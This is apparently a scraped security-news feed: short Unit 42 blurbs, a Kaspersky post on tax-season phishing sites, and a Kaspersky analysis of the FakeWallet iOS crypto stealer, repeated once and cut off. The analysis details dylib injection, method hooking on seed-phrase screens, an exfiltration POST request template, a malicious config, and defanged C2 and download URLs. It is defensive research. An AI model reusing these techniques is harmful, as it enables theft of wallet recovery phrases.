Reading view

The npm Threat Landscape: Attack Surface and Mitigations (Updated June 2)

Unit 42 analyzes npm supply chain evolution post-Shai Hulud. Discover wormable malware, CI/CD persistence, multi-stage attacks and more.

The post The npm Threat Landscape: Attack Surface and Mitigations (Updated June 2) appeared first on Unit 42.

  •  

Spam and phishing targeting taxpayers | Kaspersky official blog

In many countries, spring is the traditional time for filing income tax returns. These documents are a goldmine for bad actors because they contain a wealth of personal data, such as employment history, income, assets, bank account details — the list goes on. It’s no surprise that scammers ramp up their efforts around this time; the internet is currently crawling with fake websites designed to look exactly like government resources and tax authorities.

With deadlines looming and numbers to crunch, the rush to get everything done in good time can cause people to let their guard down. In the shuffle, it’s easy to miss the signs that the site where you’re detailing your finances has zero connection to the revenue service, or that the file you just downloaded, supposedly from a tax inspector, is actually malware.

In this post, we break down how these fraudulent tax agency sites operate across different countries and what you should absolutely avoid doing to keep your money and sensitive information safe.

Taxpayer phishing

This season, attackers have been spoofing tax authority websites across numerous countries, including the official government portals of Germany, France, Austria, Switzerland, Brazil, Chile, and Colombia. On these fraudulent sites, scammers harvest credentials for legitimate services, and steal personal data before offering to process a tax deduction — provided the victim enters their credit card details. In some cases, they even charge a fee for this fraudulent service.

Fraudulent Chilean tax service website

A site imitating the Chilean tax authority. The victim is prompted to enter their credit card information to receive a substantial tax refund — roughly US$375. Instead, the funds are siphoned from the victim’s account directly to the scammers

Sometimes, the tactic involves accusations issued on behalf of government bodies. In the image below, for example, a “head of tax audit” in Paris informs the victim that they provided incomplete income information. To avoid penalties, the user is told to download a document and make corrections immediately. However, the PDF file hides something much worse: malware.

Spoofed French tax portal (Impots.gouv)

Instead of an official document from the French tax service, the user finds malware waiting inside the PDF

In Colombia, a fake National Directorate of Taxes and Customs site similarly prompts users to download documents that must be “unlocked with a security key”. In reality, this is simply a password-protected, malicious ZIP archive.

Fake website impersonating the Colombian National Directorate of Taxes and Customs

After entering the password, the user opens a malicious archive that infects their device

Beyond phishing sites mimicking legitimate resources, our experts have discovered fraudulent websites promising paid services for filling out and auditing tax documents — and stealing high-value data, such as taxpayer identification numbers (TINs), instead.

Scammers in Brazil offering tax prep assistance
Scammers in Brazil offer help with tax returns. To contact them, the user must provide their name, phone number, address, date of birth, email, and TIN in a special form. Handing over a TIN puts the victim at risk of fraudulent loan applications, hijacked government service accounts, and further social engineering attacks
Scammers in Brazil offering tax prep assistance
Another Brazilian scam site. If you believe the attackers, they file 60 million tax returns annually — supposedly assisting a staggering 28% of the Brazilian population

Tax-free crypto earnings

Cryptocurrency holders have emerged as a specific target for attackers. Fake German tax authorities are demanding that wallet owners “verify their digital asset holdings”, citing EU regulations for tax calculation purposes. And of course, there’s a “silver lining”: it turns out crypto earnings are supposedly tax-exempt! However, to claim this generous benefit, users must go through a “verification” procedure. The site even promises to encrypt data using a “2048-bit SSL protocol”.

To complete the “verification” process, users are prompted to enter their seed phrase — the unique sequence of words tied to a crypto wallet that grants full recovery access. This request is paired with a threat: refusing to provide the data will lead to serious legal consequences, such as fines up to one million euros or criminal prosecution.

Spoofed German tax portal (ELSTER)
An announcement on the fake ELSTER portal claims that crypto earnings are tax-free following "verification" — and that the "tax service" has no direct access to users' wallets. Should we believe it?
Spoofed German tax portal (ELSTER)
First, the user is prompted to enter their personal information…
Spoofed German tax portal (ELSTER)
…And then they choose how to verify their crypto holdings: by linking a crypto wallet or an exchange account. Among the services targeted by these scammers are Ledger, Trezor, Trust Wallet, BitBox02, KeepKey, MetaMask, Phantom, and Coinbase
Spoofed German tax portal (ELSTER)
Finally, the victim is asked to provide their seed phrase, giving scammers total control over the wallet. The attackers kindly warn the victim to make sure no one is looking at their screen while they threaten them with non-existent legal penalties for non-compliance

Attackers pulled a similar stunt on French users as well. They created a non-existent “Crypto Tax Compliance Portal”, which mimics the design of the French Ministry of Economy and Finance website. The phishing site aggressively demands that French residents submit a “digital asset declaration”.

After the user enters their personal information, the scammers prompt them to either manually enter their seed phrase, or “link” their crypto wallet to the portal. If they go through with this, their MetaMask, Binance, Coinbase, Trust Wallet, or WalletConnect wallets will be drained.

Phishing website spoofing the French Ministry of Economy and Finance
The phishing site aggressively demands that French residents provide a "digital asset declaration" (translation: they want to hijack your crypto accounts)
Phishing website spoofing the French Ministry of Economy and Finance
Once personal data is entered, scammers offer the choice of manually entering a seed phrase or "linking" a wallet to the portal

Can AI help with your tax returns?

When you have AI at your fingertips that can instantly generate text and fill out spreadsheets, there’s a serious temptation to delegate everything to it. Unfortunately, this can lead to serious consequences. First, all popular chatbots process your data on their servers, which puts your sensitive information at risk of a leak. Second, they sometimes make incredibly foolish mistakes, and that can lead to actual trouble with the taxman.

Before you tell a chatbot or an AI agent how much money you made last year — complete with detailed personal and banking info — remember how frequently leaks occur within AI-powered services and consider the risks. Don’t discuss your income with AI, don’t give it personal details like your name or address, and under no circumstances should you upload photos or numbers of vital documents such as passports, insurance info, or social security numbers. Files containing confidential information should be kept in encrypted containers, such as Kaspersky Password Manager.

If you’re still determined to use AI tools, run them locally. This can be done for free even on a standard laptop, and we’ve previously covered how to set up local language models using DeepSeek as an example. However, the quality of the output from these models is often subpar. It’s quite possible that double-checking every digit in an AI-generated response will take more time than just filling out the paperwork manually. Remember, you’re the one accountable to the tax office for any errors — not the AI.

Finally, watch out for phishing AI models that offer “assistance” with tax filing. Kaspersky experts have discovered websites where users are prompted to upload tax invoices, supposedly for the automated generation of returns and deduction claims. Instead, attackers collect this personal data to resell on the dark web, or to use in future phishing attacks, blackmail, and extortion schemes.

Phishing AI steals data from taxpayers seeking filing assistance

The creators of a fake AI tool prompt users to upload tax documents, and kindly assure them that the site doesn’t store any user data. In reality, every piece of information entered — name, address, documents, contact person, phone number — ends up in the hands of cybercriminals

Remember that all legitimate AI services explicitly warn users not to share confidential data, and tax documents certainly fall into this category. Any AI tools promising to help you handle your tax paperwork are quite simply a scam.

How to protect yourself and your data

  • File your taxes yourself. The risk of running into scammers is extremely high. Even if a consulting firm is legitimate, you’re inevitably handing over a complete dossier on yourself: passport details, employment and income info, your address, and more. Remember that even the most honest services aren’t immune to hacks and data breaches.
  • Watch out for fake websites. Use a reliable security solution that prevents you from visiting phishing sites and blocks malicious file downloads.
  • Keep all important documents encrypted. Storing photos, notes, or files on your desktop, or starred messages in a messaging app isn’t a secure way to handle sensitive data. A secure vault like Kaspersky Password Manager can store more than just passwords and credit card info; it can also safeguard documents and even photos.
  • Don’t trust AI. Even the most advanced chatbots are prone to errors and hallucinations, and in theory, developers can read any conversation you have with their AI. If you absolutely must use AI, install and run a local version on your own computer.
  • Stick to official channels only. The “chief tax inspector” of your country or city is definitely not going to message you: high-ranking officials have more important things to do. Only contact tax authorities through official channels, and carefully verify the sender of any emails you receive. Most often, even a slight deviation in the name or address is a telltale sign of a phishing campaign.

Further reading on phishing and data security:

  •  
  •  

Fracturing Software Security With Frontier AI Models

Unit 42 finds frontier AI models enhance vulnerability discovery, acting as full-spectrum security researchers. They enable autonomous zero-day discovery and faster N-day patching.

The post Fracturing Software Security With Frontier AI Models appeared first on Unit 42.

  •  

FakeWallet crypto stealer spreading through iOS apps in the App Store

In March 2026, we uncovered more than twenty phishing apps in the Apple App Store masquerading as popular crypto wallets. Once launched, these apps redirect users to browser pages designed to look similar to the App Store and distributing trojanized versions of legitimate wallets. The infected apps are specifically engineered to hijack recovery phrases and private keys. Metadata from the malware suggests this campaign has been flying under the radar since at least the fall of 2025.

We’ve seen this happen before. Back in 2022, ESET researchers spotted compromised crypto wallets distributed through phishing sites. By abusing iOS provisioning profiles to install malware, attackers were able to steal recovery phrases from major hot wallets like Metamask, Coinbase, Trust Wallet, TokenPocket, Bitpie, imToken, and OneKey. Fast forward four years, and the same crypto-theft scheme is gaining momentum again, now featuring new malicious modules, updated injection techniques, and distribution through phishing apps in the App Store.

Kaspersky products detect this threat as HEUR:Trojan-PSW.IphoneOS.FakeWallet.* and HEUR:Trojan.IphoneOS.FakeWallet.*.

Technical details

Background

This past March, we noticed a wave of phishing apps topping the search results in the Chinese App Store, all disguised as popular crypto wallets. Because of regional restrictions, many official crypto wallet apps are currently unavailable to users in China, specifically if they have their Apple ID set to the Chinese region. Scammers are jumping on this opportunity. They’ve launched fake apps using icons that mirror the originals and names with intentional typos – a tactic known as typosquatting – to slip past App Store filters and increase their chances of deceiving users.

App Store search results for "Ledger Wallet" (formerly Ledger Live)

App Store search results for “Ledger Wallet” (formerly Ledger Live)

In some instances, the app names and icons had absolutely nothing to do with cryptocurrency. However, the promotional banners for these apps claimed that the official wallet was “unavailable in the App Store” and directed users to download it through the app instead.

Promotional screenshots from apps posing as the official TokenPocket app

Promotional screenshots from apps posing as the official TokenPocket app

During our investigation, we identified 26 phishing apps in the App Store mimicking the following major wallets:

  • MetaMask
  • Ledger
  • Trust Wallet
  • Coinbase
  • TokenPocket
  • imToken
  • Bitpie

We’ve reported all of these findings to Apple, and several of the malicious apps have already been pulled from the store.

We also identified several similar apps that didn’t have any phishing functionality yet, but showed every sign of being linked to the same threat actors. It’s highly likely that the malicious features were simply waiting to be toggled on in a future update.

The phishing apps featured stubs – functional placeholders that mimicked a legitimate service – designed to make the app appear authentic.  The stub could be a game, a calculator, or a task planner.

However, once you launched the app, it would open a malicious link in your browser. This link kicks off a scheme leveraging provisioning profiles to install infected versions of crypto wallets onto the victim’s device. This technique isn’t exclusive to FakeWallet; other iOS threats, like SparkKitty, use similar methods. These profiles come in a few flavors, one of them being enterprise provisioning profiles. Apple designed these so companies could create and deploy internal apps to employees without going through the App Store or hitting device limits. Enterprise provisioning profiles are a favorite tool for makers of software cracks, cheats, online casinos, pirated mods of popular apps, and malware.

An infected wallet and its corresponding profile used for the installation process

An infected wallet and its corresponding profile used for the installation process

Malicious modules for hot wallets

The attackers have churned out a wide variety of malicious modules, each tailored to a specific wallet. In most cases, the malware is delivered via a malicious library injection, though we’ve also come across builds where the app’s original source code was modified.

To embed the malicious library, the hackers injected load commands into the main executable. This is a standard trick to expand an app’s functionality without a rebuild. Once the library is loaded, the dyld linker triggers initialization functions, if present in the library. We’ve seen this implemented in different ways: sometimes by adding a load method to specific Objective-C classes, and other times through standard C++ functions.

The logic remains the same across all initialization functions: the app loads or initializes its configuration, if available, and then swaps out legitimate class methods for malicious versions. For instance, we found a malicious library named libokexHook.dylib embedded in a modified version of the Coinbase app. It hijacks the original viewDidLoad method within the RecoveryPhraseViewController class, the part of the code responsible for the screen where the user enters their recovery phrase.

A code snippet where a malicious initialization function hijacks the original viewDidLoad method of the class responsible for the recovery phrase screen

A code snippet where a malicious initialization function hijacks the original viewDidLoad method of the class responsible for the recovery phrase screen

The compromised viewDidLoad method works by scanning the screen in the current view controller (the object managing that specific app screen) to hunt for mnemonics – the individual words that make up the seed phrase. Once it finds them, it extracts the data, encrypts it, and beams it back to a C2 server. All these malicious modules follow a specific process to exfiltrate data:

  • The extracted mnemonics are stringed together.
  • This string is encrypted using RSA with the PKCS #1 scheme.
  • The encrypted data is then encoded into Base64.
  • Finally, the encoded string – along with metadata like the malicious module type, the app name, and a unique identification code – is sent to the attackers’ server.
The malicious viewDidLoad method at work, scraping seed phrase words from individual subviews

The malicious viewDidLoad method at work, scraping seed phrase words from individual subviews

In this specific variant, the C2 server address is hardcoded directly into the executable. However, in other versions we’ve analyzed, the Trojan pulls the address from a configuration file tucked away in the app folder.

The POST request used to exfiltrate those encrypted mnemonics looks like this:

POST <c2_domain>/api/open/postByTokenPocket?ciyu=<base64_encoded_encrypted_mnemonics>&code=10001&ciyuType=1&wallet=ledger

The version of the malicious module targeting Trust Wallet stands out from the rest. It skips the initialization functions entirely. Instead, the attackers injected a custom executable section, labeled __hook, directly into the main executable. They placed it right before the __text section, specifically in the memory region usually reserved for load commands in the program header. The first two functions in this section act as trampolines to the dlsym function and the mnemonic validation method within the original WalletCore class. These are followed by two wrapper functions designed to:

  • Resolve symbols dataInit or processX0Parameter from the malicious library
  • Hand over control to these newly discovered functions
  • Execute the code for the original methods that the wrapper was built to replace
The content of the embedded __hook section, showing the trampolines and wrapper functions

The content of the embedded __hook section, showing the trampolines and wrapper functions

These wrappers effectively hijack the methods the app calls whenever a user tries to restore a wallet using a seed phrase or create a new one. By following the same playbook described earlier, the Trojan scrapes the mnemonics directly from the corresponding screens, encrypts them, and beams them back to the C2 server.

The Ledger wallet malicious module

The modules we’ve discussed so far were designed to rip recovery phrases from hot wallets – apps that store and use private keys directly on the device where they are installed. Cold wallets are a different beast: the keys stay on a separate, offline device, and the app is just a user interface with no direct access to them. To get their hands on those assets, the attackers fall back on old-school phishing.

We found two versions of the Ledger implant, one using a malicious library injection and another where the app’s source code itself was tampered with. In the library version, the malware sneaks in through standard entry points:  two Objective-C initialization functions (+[UIViewController load] and +[UIView load]) and a function named entry located in the __mod_init_functions section. Once the malicious library is loaded into the app’s memory, it goes to work:

  • The entry function loads a configuration file from the app directory, generates a user UUID, and attempts to send it to the server specified by the login-url The config file looks like this:
    {
    	"url": "hxxps://iosfc[.]com/ledger/ios/Rsakeycatch.php", // C2 for mnemonics
    	"code": "10001",                                         // special code	"login-url": "hxxps://xxx[.]com",                                              
    	"login-code": "88761"                                                               
    }
  • Two other initialization functions, +[UIViewController load] and +[UIView load], replace certain methods of the original app classes with their malicious payload.
  • As soon as the root screen is rendered, the malware traverses the view controller hierarchy and searches for a child screen named add-account-cta or one containing a $ sign:
    • If it is the add-account-cta screen, the Trojan identifies the button responsible for adding a new account and matches its text to a specific language. The Trojan uses this to determine the app’s locale so it can later display a phishing alert in the appropriate language. It then prepares a phishing notification whose content will require the user to pass a “security check”, and stores it in an object of GlobalVariables
    • If it’s a screen with a $ sign in its name, the malware scans its content using a regular expression to extract the wallet balance and attempt to send this balance information to a harmless domain specified in the configuration as login-url. We assume this is outdated testing functionality left in the code by mistake, as the specified domain is unrelated to the malware.
  • Then, when any screen is rendered, one of the malicious handlers checks its name. If it is the screen responsible for adding an account or buying/selling cryptocurrency, the malware displays the phishing notification prepared earlier. Clicking on this notification opens a WebView window, where the local HTML file html serves as the page to display.

The verify.html phishing page prompts the user to enter their mnemonics. The malware then checks the seed phrase entered by the user against the BIP-39 dictionary, a standard that uses 2048 mnemonic words to generate seed phrases. Additionally, to lower the victim’s guard, the phishing page is designed to match the app’s style and even supports autocomplete for mnemonics to project quality. The seed phrase is passed to an Objective-C handler, which merges it into a single string, encrypts it using RSA with the PKCS #1 scheme, and sends it to the C2 server along with additional data – such as the malicious module type, app name, and a specific config code – via an HTTP POST request to the /ledger/ios/Rsakeycatch.php endpoint.

The Objective-C handler responsible for exfiltrating mnemonics

The Objective-C handler responsible for exfiltrating mnemonics

The second version of the infected Ledger wallet involves changes made directly to the main code of the app written in React Native. This approach eliminates the need for platform-specific libraries and allows attackers to run the same malicious module across different platforms. Since the Ledger Live source code is publicly available, injecting malicious code into it is a straightforward task for the attackers.
The infected build includes two malicious screens:

  • MnemonicVerifyScreen, embedded in PortfolioNavigator
  • PrivateKeyVerifyScreen, embedded in MyLedgerNavigator

In the React Native ecosystem, navigators handle switching between different screens. In this case, these specific navigators are triggered when the Portfolio or Device List screens are opened. In the original app, these screens remain inaccessible until the user pairs their cold wallet with the application. This same logic is preserved in the infected version, effectively serving as an anti-debugging technique: the phishing window only appears during a realistic usage scenario.

Phishing window for seed phrase verification

Phishing window for seed phrase verification

The MnemonicVerifyScreen appears whenever either of those navigators is activated – whether the user is checking their portfolio or viewing info about a paired device. The PrivateKeyVerifyScreen remains unused – it is designed to handle a private key rather than a mnemonic, specifically the key generated by the wallet based on the entered seed phrase. Since Ledger Live doesn’t give users direct access to private keys or support them for importing wallets, we suspect this specific feature was actually intended for a different app.

Decompiled pseudocode of an anonymous malicious function setting up the configuration during app startup

Decompiled pseudocode of an anonymous malicious function setting up the configuration during app startup

Once a victim enters their recovery phrase on the phishing page and hits Confirm, the Trojan creates a separate thread to handle the data exfiltration. It tracks the progress of the transfer by creating three files in the app’s working directory:

  • verify-wallet-status.json tracks the current status and the timestamp of the last update.
  • verify-wallet-config.json stores the C2 server configuration the malware is currently using.
  • verify-wallet-pending.json holds encrypted mnemonics until they’re successfully transmitted to the C2 server. Then the clearPendingMnemonicJob function replaces the contents of the file with an empty JSON dictionary.

Next, the Trojan encrypts the captured mnemonics and sends the resulting value to the C2 server. The data is encrypted using the same algorithm described earlier (RSA encryption followed by Base64 encoding). If the app is closed or minimized, the Trojan checks the status of the previous exfiltration attempt upon restart and resumes the process if it hasn’t been completed.

Decompiled pseudocode for the submitWalletSecret function

Decompiled pseudocode for the submitWalletSecret function

Other distribution channels, platforms, and the SparkKitty link

During our investigation, we discovered a website mimicking the official Ledger site that hosted links to the same infected apps described above. While we’ve only observed one such example, we’re certain that other similar phishing pages exist across the web.

A phishing website hosting links to infected Ledger apps for both iOS and Android

A phishing website hosting links to infected Ledger apps for both iOS and Android

We also identified several compromised versions of wallet apps for Android, including both previously undiscovered samples and known ones. These instances were distributed through the same malicious pages; however, we found no traces of them in the Google Play Store.

One additional detail: some of the infected apps also contained a SparkKitty module. Interestingly, these modules didn’t show any malicious activity on their own, with mnemonics handled exclusively by the FakeWallet modules. We suspect SparkKitty might be present for one of two reasons: either the authors of both malicious campaigns are linked and forgot to remove it, or it was embedded by different attackers and is currently inactive.

Victims

Since nearly all the phishing apps were exclusive to the Chinese App Store, and the infected wallets themselves were distributed through Chinese-language phishing pages, we can conclude that this campaign primarily targets users in China. However, the malicious modules themselves have no built-in regional restrictions. Furthermore, since the phishing notifications in some variants automatically adapt to the app’s language, users outside of China could easily find themselves in the crosshairs of these attackers.

Attribution

According to our data, the threat actor behind this campaign may be linked to the creators of the SparkKitty Trojan. Several details uncovered during our research point to this connection:

  • Some infected apps contained SparkKitty modules alongside the FakeWallet code.
  • The attackers behind both campaigns appear to be native Chinese speakers, as the malicious modules frequently use log messages in Chinese.
  • Both campaigns distribute infected apps via phishing pages that mimic the official App Store.
  • Both campaigns specifically target victims’ cryptocurrency assets.

Conclusion

Our research shows that the FakeWallet campaign is gaining momentum by employing new tactics, ranging from delivering payloads via phishing apps published in the App Store to embedding themselves into cold wallet apps and using sophisticated phishing notifications to trick users into revealing their mnemonics. The fact that these phishing apps bypass initial filters to appear at the top of App Store search results can significantly lower a user’s guard. While the campaign is not exceptionally complex from a technical standpoint, it poses serious risks to users for several reasons:

  • Hot wallet attacks: the malware can steal crypto assets during the wallet creation or import phase without any additional user interaction.
  • Cold wallet attacks: attackers go to great lengths to make their phishing windows look legitimate, even implementing mnemonic autocomplete to mirror the real user experience and increase their chances of a successful theft.
  • Investigation challenges: the technical restrictions imposed by iOS and the broader Apple ecosystem make it difficult to effectively detect and analyze malicious software directly on a device.

Indicators of compromise

Infected cryptowallet IPA file hashes
4126348d783393dd85ede3468e48405d
b639f7f81a8faca9c62fd227fef5e28c
d48b580718b0e1617afc1dec028e9059
bafba3d044a4f674fc9edc67ef6b8a6b
79fe383f0963ae741193989c12aefacc
8d45a67b648d2cb46292ff5041a5dd44
7e678ca2f01dc853e85d13924e6c8a45

Malicious dylib file hashes
be9e0d516f59ae57f5553bcc3cf296d1
fd0dc5d4bba740c7b4cc78c4b19a5840
7b4c61ff418f6fe80cf8adb474278311
8cbd34393d1d54a90be3c2b53d8fc17a
d138a63436b4dd8c5a55d184e025ef99
5bdae6cb778d002c806bb7ed130985f3

Malicious React Native application hash
84c81a5e49291fe60eb9f5c1e2ac184b

Phishing HTML for infected Ledger Live app file hash
19733e0dfa804e3676f97eff90f2e467

Malicious Android file hashes
8f51f82393c6467f9392fb9eb46f9301
114721fbc23ff9d188535bd736a0d30e

Malicious download links
hxxps://www.gxzhrc[.]cn/download/
hxxps://appstoreios[.]com/DjZH?key=646556306F6Q465O313L737N3332939Y353I830F31
hxxps://crypto-stroe[.]cc/
hxxps://yjzhengruol[.]com/s/3f605f
hxxps://6688cf.jhxrpbgq[.]com/6axqkwuq
hxxps://139.180.139[.]209/prod-api/system/confData/getUserConfByKey/
hxxps://xz.apps-store[.]im/s/iuXt?key=646Y563Y6F6H465J313X737U333S9342323N030R34&c=
hxxps://xz.apps-store[.]im/DjZH?key=646B563L6F6N4657313B737U3436335E3833331737
hxxps://xz.apps-store[.]im/s/dDan?key=646756376F6A465D313L737J333993473233038L39&c=
hxxps://xz.apps-store[.]im/CqDq?key=646R563V6F6Y465K313J737G343C3352383R336O35
hxxps://ntm0mdkzymy3n.oukwww[.]com/7nhn7jvv5YieDe7P?0e7b9c78e=686989d97cf0d70346cbde2031207cbf
hxxps://ntm0mdkzymy3n.oukwww[.]com/jFms03nKTf7RIZN8?61f68b07f8=0565364633b5acdd24a498a6a9ab4eca
hxxps://nziwytu5n.lahuafa[.]com/10RsW/mw2ZmvXKUEbzI0n
hxxps://zdrhnmjjndu.ulbcl[.]com/7uchSEp6DIEAqux?a3f65e=417ae7f384c49de8c672aec86d5a2860
hxxps://zdrhnmjjndu.ulbcl[.]com/tWe0ASmXJbDz3KGh?4a1bbe6d=31d25ddf2697b9e13ee883fff328b22f
hxxps://api.npoint[.]io/153b165a59f8f7d7b097
hxxps://mti4ywy4.lahuafa[.]com/UVB2U/mw2ZmvXKUEbzI0n
hxxps://mtjln.siyangoil[.]com/08dT284P/1ZMz5Xmb0EoQZVvS5
hxxps://odm0.siyangoil[.]com/TYTmtV8t/JG6T5nvM1AYqAcN
hxxps://mgi1y.siyangoil[.]com/vmzLvi4Dh/1Dd0m4BmAuhVVCbzF
hxxps://mziyytm5ytk.ahroar[.]com/kAN2pIEaariFb8Yc
hxxps://ngy2yjq0otlj.ahroar[.]com/EpCXMKDMx1roYGJ
hxxps://ngy2yjq0otlj.ahroar[.]com/17pIWJfr9DBiXYrSb

C2 addresses
hxxps://kkkhhhnnn[.]com/api/open/postByTokenpocket
hxxps://helllo2025[.]com/api/open/postByTokenpocket
hxxps://sxsfcc[.]com/api/open/postByTokenpocket
hxxps://iosfc[.]com/ledger/ios/Rsakeycatch.php
hxxps://nmu8n[.]com/tpocket/ios/Rsakeyword.php
hxxps://zmx6f[.]com/btp/ios/receiRsakeyword.php
hxxps://api.dc1637[.]xyz

  •  

FakeWallet crypto stealer spreading through iOS apps in the App Store

In March 2026, we uncovered more than twenty phishing apps in the Apple App Store masquerading as popular crypto wallets. Once launched, these apps redirect users to browser pages designed to look similar to the App Store and distributing trojanized versions of legitimate wallets. The infected apps are specifically engineered to hijack recovery phrases and private keys. Metadata from the malware suggests this campaign has been flying under the radar since at least the fall of 2025.

We’ve seen this happen before. Back in 2022, ESET researchers spotted compromised crypto wallets distributed through phishing sites. By abusing iOS provisioning profiles to install malware, attackers were able to steal recovery phrases from major hot wallets like Metamask, Coinbase, Trust Wallet, TokenPocket, Bitpie, imToken, and OneKey. Fast forward four years, and the same crypto-theft scheme is gaining momentum again, now featuring new malicious modules, updated injection techniques, and distribution through phishing apps in the App Store.

Kaspersky products detect this threat as HEUR:Trojan-PSW.IphoneOS.FakeWallet.* and HEUR:Trojan.IphoneOS.FakeWallet.*.

Technical details

Background

This past March, we noticed a wave of phishing apps topping the search results in the Chinese App Store, all disguised as popular crypto wallets. Because of regional restrictions, many official crypto wallet apps are currently unavailable to users in China, specifically if they have their Apple ID set to the Chinese region. Scammers are jumping on this opportunity. They’ve launched fake apps using icons that mirror the originals and names with intentional typos – a tactic known as typosquatting – to slip past App Store filters and increase their chances of deceiving users.

App Store search results for "Ledger Wallet" (formerly Ledger Live)

App Store search results for “Ledger Wallet” (formerly Ledger Live)

In some instances, the app names and icons had absolutely nothing to do with cryptocurrency. However, the promotional banners for these apps claimed that the official wallet was “unavailable in the App Store” and directed users to download it through the app instead.

Promotional screenshots from apps posing as the official TokenPocket app

Promotional screenshots from apps posing as the official TokenPocket app

During our investigation, we identified 26 phishing apps in the App Store mimicking the following major wallets:

  • MetaMask
  • Ledger
  • Trust Wallet
  • Coinbase
  • TokenPocket
  • imToken
  • Bitpie

We’ve reported all of these findings to Apple, and several of the malicious apps have already been pulled from the store.

We also identified several similar apps that didn’t have any phishing functionality yet, but showed every sign of being linked to the same threat actors. It’s highly likely that the malicious features were simply waiting to be toggled on in a future update.

The phishing apps featured stubs – functional placeholders that mimicked a legitimate service – designed to make the app appear authentic.  The stub could be a game, a calculator, or a task planner.

However, once you launched the app, it would open a malicious link in your browser. This link kicks off a scheme leveraging provisioning profiles to install infected versions of crypto wallets onto the victim’s device. This technique isn’t exclusive to FakeWallet; other iOS threats, like SparkKitty, use similar methods. These profiles come in a few flavors, one of them being enterprise provisioning profiles. Apple designed these so companies could create and deploy internal apps to employees without going through the App Store or hitting device limits. Enterprise provisioning profiles are a favorite tool for makers of software cracks, cheats, online casinos, pirated mods of popular apps, and malware.

An infected wallet and its corresponding profile used for the installation process

An infected wallet and its corresponding profile used for the installation process

Malicious modules for hot wallets

The attackers have churned out a wide variety of malicious modules, each tailored to a specific wallet. In most cases, the malware is delivered via a malicious library injection, though we’ve also come across builds where the app’s original source code was modified.

To embed the malicious library, the hackers injected load commands into the main executable. This is a standard trick to expand an app’s functionality without a rebuild. Once the library is loaded, the dyld linker triggers initialization functions, if present in the library. We’ve seen this implemented in different ways: sometimes by adding a load method to specific Objective-C classes, and other times through standard C++ functions.

The logic remains the same across all initialization functions: the app loads or initializes its configuration, if available, and then swaps out legitimate class methods for malicious versions. For instance, we found a malicious library named libokexHook.dylib embedded in a modified version of the Coinbase app. It hijacks the original viewDidLoad method within the RecoveryPhraseViewController class, the part of the code responsible for the screen where the user enters their recovery phrase.

A code snippet where a malicious initialization function hijacks the original viewDidLoad method of the class responsible for the recovery phrase screen

A code snippet where a malicious initialization function hijacks the original viewDidLoad method of the class responsible for the recovery phrase screen

The compromised viewDidLoad method works by scanning the screen in the current view controller (the object managing that specific app screen) to hunt for mnemonics – the individual words that make up the seed phrase. Once it finds them, it extracts the data, encrypts it, and beams it back to a C2 server. All these malicious modules follow a specific process to exfiltrate data:

  • The extracted mnemonics are stringed together.
  • This string is encrypted using RSA with the PKCS #1 scheme.
  • The encrypted data is then encoded into Base64.
  • Finally, the encoded string – along with metadata like the malicious module type, the app name, and a unique identification code – is sent to the attackers’ server.
The malicious viewDidLoad method at work, scraping seed phrase words from individual subviews

The malicious viewDidLoad method at work, scraping seed phrase words from individual subviews

In this specific variant, the C2 server address is hardcoded directly into the executable. However, in other versions we’ve analyzed, the Trojan pulls the address from a configuration file tucked away in the app folder.

The POST request used to exfiltrate those encrypted mnemonics looks like this:

POST <c2_domain>/api/open/postByTokenPocket?ciyu=<base64_encoded_encrypted_mnemonics>&code=10001&ciyuType=1&wallet=ledger

The version of the malicious module targeting Trust Wallet stands out from the rest. It skips the initialization functions entirely. Instead, the attackers injected a custom executable section, labeled __hook, directly into the main executable. They placed it right before the __text section, specifically in the memory region usually reserved for load commands in the program header. The first two functions in this section act as trampolines to the dlsym function and the mnemonic validation method within the original WalletCore class. These are followed by two wrapper functions designed to:

  • Resolve symbols dataInit or processX0Parameter from the malicious library
  • Hand over control to these newly discovered functions
  • Execute the code for the original methods that the wrapper was built to replace
The content of the embedded __hook section, showing the trampolines and wrapper functions

The content of the embedded __hook section, showing the trampolines and wrapper functions

These wrappers effectively hijack the methods the app calls whenever a user tries to restore a wallet using a seed phrase or create a new one. By following the same playbook described earlier, the Trojan scrapes the mnemonics directly from the corresponding screens, encrypts them, and beams them back to the C2 server.

The Ledger wallet malicious module

The modules we’ve discussed so far were designed to rip recovery phrases from hot wallets – apps that store and use private keys directly on the device where they are installed. Cold wallets are a different beast: the keys stay on a separate, offline device, and the app is just a user interface with no direct access to them. To get their hands on those assets, the attackers fall back on old-school phishing.

We found two versions of the Ledger implant, one using a malicious library injection and another where the app’s source code itself was tampered with. In the library version, the malware sneaks in through standard entry points:  two Objective-C initialization functions (+[UIViewController load] and +[UIView load]) and a function named entry located in the __mod_init_functions section. Once the malicious library is loaded into the app’s memory, it goes to work:

  • The entry function loads a configuration file from the app directory, generates a user UUID, and attempts to send it to the server specified by the login-url The config file looks like this:
    {
    	"url": "hxxps://iosfc[.]com/ledger/ios/Rsakeycatch.php", // C2 for mnemonics
    	"code": "10001",                                         // special code	"login-url": "hxxps://xxx[.]com",                                              
    	"login-code": "88761"                                                               
    }
  • Two other initialization functions, +[UIViewController load] and +[UIView load], replace certain methods of the original app classes with their malicious payload.
  • As soon as the root screen is rendered, the malware traverses the view controller hierarchy and searches for a child screen named add-account-cta or one containing a $ sign:
    • If it is the add-account-cta screen, the Trojan identifies the button responsible for adding a new account and matches its text to a specific language. The Trojan uses this to determine the app’s locale so it can later display a phishing alert in the appropriate language. It then prepares a phishing notification whose content will require the user to pass a “security check”, and stores it in an object of GlobalVariables
    • If it’s a screen with a $ sign in its name, the malware scans its content using a regular expression to extract the wallet balance and attempt to send this balance information to a harmless domain specified in the configuration as login-url. We assume this is outdated testing functionality left in the code by mistake, as the specified domain is unrelated to the malware.
  • Then, when any screen is rendered, one of the malicious handlers checks its name. If it is the screen responsible for adding an account or buying/selling cryptocurrency, the malware displays the phishing notification prepared earlier. Clicking on this notification opens a WebView window, where the local HTML file html serves as the page to display.

The verify.html phishing page prompts the user to enter their mnemonics. The malware then checks the seed phrase entered by the user against the BIP-39 dictionary, a standard that uses 2048 mnemonic words to generate seed phrases. Additionally, to lower the victim’s guard, the phishing page is designed to match the app’s style and even supports autocomplete for mnemonics to project quality. The seed phrase is passed to an Objective-C handler, which merges it into a single string, encrypts it using RSA with the PKCS #1 scheme, and sends it to the C2 server along with additional data – such as the malicious module type, app name, and a specific config code – via an HTTP POST request to the /ledger/ios/Rsakeycatch.php endpoint.

The Objective-C handler responsible for exfiltrating mnemonics

The Objective-C handler responsible for exfiltrating mnemonics

